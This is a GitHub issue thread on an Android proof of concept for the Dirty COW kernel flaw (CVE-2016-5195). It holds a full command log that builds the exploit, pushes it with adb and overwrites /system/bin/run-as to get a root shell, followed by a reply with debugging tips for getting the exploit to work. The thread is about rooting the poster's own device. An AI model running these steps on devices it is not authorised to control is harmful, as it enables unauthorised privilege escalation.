search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

Root shell not outputting the result of id command #65

Open zoobab opened 7 years ago

zoobab commented 7 years ago

Hi,

I am obtaining a root shell on my Meizu M2, but any command I input is giving nothing back in return:

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-22
make[1]: Entering directory `/home/zoobab/soft/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory `/home/zoobab/soft/CVE-2016-5195'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
199 KB/s (9760 bytes in 0.047s)
adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
207 KB/s (9760 bytes in 0.045s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (9760) and destination file size (13864) differ

[*] size 9760
[*] mmap 0x7faf542000
[*] currently 0x7faf542000=10102464c457f
[*] madvise = 0x7faf542000 9760
[*] madvise = 0 0
[*] /proc/self/mem 1590880 163
[*] exploited 0x7faf542000=10102464c457f
adb shell /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@m2:/ # id

Any idea why?

droidvoider commented 7 years ago

When I am patching stuff if I use the incorrect file size I know it's time to reboot. First things always get to the correct file size exactly. If all else fails add headers, add some code that is only called when a variable is 987 but it never gets set.. whatever it takes, make it match the size of your run-as Get your run-as size through adb shell: adb shell ls -la /system/bin/run-as

Ideas and maybe good tips You should be looking at your logcat, specifically: adb logcat | grep -a exploit In addition to that you can also open another adb shell while the root shell is hung and try issuing ps to list the processes. or ps | grep 'whatever_to_filter' Next start adding extra LOGV("TOP of run-as"); You can add variables in your LOGV("values %c",charVal); and just keep poking to see what's not what.

Take notes, be organized and build a process Because you are a lot closer than I am I can't issue run-as in this example my phone is locked down too much. Have you patched sepolicy using a method such as those findable on xda-developers? I have models like my phone with custom roms, I have AT&T, I could use those init and base files. Maybe you can too? Check rooting methods for other devices using dirtycow on github also

good luck